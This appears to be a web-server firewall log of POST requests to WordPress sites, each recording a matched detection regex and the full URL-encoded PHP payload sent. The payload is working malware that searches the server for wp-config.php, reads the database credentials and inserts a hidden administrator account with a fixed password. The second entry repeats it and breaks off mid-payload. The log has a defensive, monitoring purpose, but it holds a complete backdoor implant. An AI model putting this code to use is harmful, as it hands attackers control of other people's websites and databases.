["2026-05-16 00:08:48","213.209.159.254","POST","\/wp-admin\/includes\/theme.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.5 Safari\/605.1.15","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> Co:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-admin\/includes\/theme.php HTTP\/1.1\ncontent-type:application\/x-www-form-urlencoded\ncookie:4=00cb3882c8d180ef2319e46eab0e93ae; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvD28vKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzkiL2gyMPV7nJLbMzyfMI9jqKEsL29hqTIhqUZbWUNfWTZcXKgcozAfqJEyVPEjB0O1ozkcozfbWUNcB2I4nKD7sK19MTyyXPVuoz90q3W0LzjuVvx7; 1=53; 0=71\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.5 Safari\/605.1.15\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\ncontent-length:12640\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\n\nCo=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 00:09:05","213.209.159.254","POST","\/wp-includes\/sitemaps\/nthemwz\/lpqfmis\/vgtfqmb\/attack.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/104.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> sX:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60